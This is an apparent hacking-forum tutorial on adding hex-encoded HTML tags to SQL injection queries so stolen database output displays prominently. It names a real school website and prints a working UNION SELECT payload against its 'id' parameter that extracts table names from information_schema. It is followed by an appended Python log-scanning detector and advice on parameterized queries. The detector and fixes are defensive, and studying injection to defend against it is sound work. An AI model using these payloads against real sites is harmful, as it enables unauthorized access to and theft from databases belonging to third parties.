Salam Pak leets ..
In this tutorial I will show you how to add HTML tags and designs to your SQL Injection queries..
-----> By using HTML tags in our SQLi query, we can arrange the output in a proper way.
-----> Sometimes the result of our query appears in the source of the webpage or in the title or sometimes in the URL. In that case we add HTML tags to make it more visible on the webpage.
-----> I don't know about you guys but as you can see I like colors and decoration .. A LOT ..
First of all, I assume you guys have sound knowledge of SQL injection and basic HTML.
For this Tutorial .. The site I'm going to inject is :
Here is the vulnerable link where parameter 'id' is vulnerable to a very simple SQLi.
So, let's start with some very basic injection, and I can quickly see that there are 9 columns here.
And I will inject in the 4th column. So let's get the database name in the 4th column.
Now, look at the database name. It is visible ( not in the source code but on the proper page ) but the font size is very small .. Don't know about you .. but I don't like it.
Now, let me show you the wonders of HTML tags.
We can always add HTML in our SQLi query. Sometimes we can write it directly enclosed in single quotes like :
concat ('<opening_tags>', QUERY , '<closing_tags>')
But most of the time this syntax is not allowed and we have to convert our HTML tags to HEX, like ..
concat(0xHEX_value_of_opening_tag , QUERY , 0xHEX_value_of_closing_tag)
Notice these 0x here .. The 0x prefix marks what follows as a HEX literal, so the database decodes it from HEX back into the original string before executing the query.
The following is the basic usage of these tags. You can use your creativity and endless imagination.
Let's start with an HTML tag called <font>.
Usage : <font size="8" color="red"> MakMan </font>
I'm going to use this tag in our query, but this website doesn't allow HTML tags to be used directly, so we have to convert them to HEX first. Just follow the syntax.
Now my format should be:
To convert to HEX, you can use many online tools. Just google: String to HEX converter
After converting my opening and closing tags in this case:
Opening_tag = <font size="8" color="red"> ---- HEX ---> 3c666f6e742073697a653d22382220636f6c6f723d22726564223e
Closing_tag = </font> ---- HEX ---> 3c2f666f6e743e
Putting these HEX values in my format, my query will become:
Look at the result now .. Sweet
Most people write their names in SQL Injection with their query. Let's try that.
Creativity has no boundaries.
My HTML syntax before converting to HEX (just to show you guys what I'm doing; it will not work, you have to convert it to HEX):
hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,group_concat(0x<br><font face='calibri' size="5" color="green">MakMan</font><font face='Impact' size="4" color="red">,table_name,0x</font>,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--
My HTML syntax after converting it to HEX:
Check the result. Now just imagine what else you can do with it.
It took me an hour to write this thread but I want to share the credits of this tutorial with -ajkaro , the best SQL injector I have ever known. Let me show you guys some of his art work with manual SQLi.
NOTE: If you copy-paste these links from here into your browser tab, make sure to paste them in Notepad first and delete these bugs ..
These bugs appear because when we copy-paste directly from a MyBB thread page, we also copy some Unicode characters like this zero width space &'#8203; which, when it ends up in a query, stops the results from showing properly ..
and lastly .. shouts to some MADS out there ..
u guys are and always will be my favorite .. My respects ..
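For defenders, the hex-encoded tags described in this tutorial leave a recognisable trace in web server logs. The Python sketch below is an added example, not part of the original post: it decodes 0x literals in a request's query string and flags requests where they decode to HTML tags next to SQL keywords. The /item.php and /search.php paths are constructed sample input; the hex values are the two shown earlier on this page.

```python
import re
from urllib.parse import unquote_plus

# Hex literal as used in the tutorial: 0x followed by whole bytes of hex digits.
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)")
# An opening or closing HTML tag inside the decoded text.
HTML_TAG = re.compile(r"</?[a-zA-Z][^<>]*>")
# SQL keywords and functions that appear in the tutorial's queries.
SQL_CONTEXT = re.compile(r"\b(union|select|concat|group_concat)\b", re.I)


def decode_hex_literals(text):
    """Return the decoded string for every 0x... literal found in text."""
    decoded = []
    for match in HEX_LITERAL.finditer(text):
        raw = bytes.fromhex(match.group(1))
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


def inspect_request(request_target):
    """Flag a request whose query carries hex literals that decode to HTML tags."""
    query = unquote_plus(request_target.partition("?")[2])
    tags = [t for s in decode_hex_literals(query) for t in HTML_TAG.findall(s)]
    return {
        "suspicious": bool(tags) and bool(SQL_CONTEXT.search(query)),
        "decoded_tags": tags,
    }


# Constructed request targets (hypothetical paths, not taken from real logs).
SAMPLES = [
    "/item.php?id=92",
    "/item.php?id=92+and+0+union+select+1,2,3,concat("
    "0x3c666f6e742073697a653d22382220636f6c6f723d22726564223e,database(),"
    "0x3c2f666f6e743e),5,6,7,8,9--",
    "/search.php?color=0xff00ff",  # benign hex value, decodes to no tag
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(inspect_request(target)["suspicious"], target[:60])
```

A hit here means the application is both injectable and reflecting database output without HTML-encoding it, so the fixes are parameterized queries and output encoding; the log check only tells you where to look.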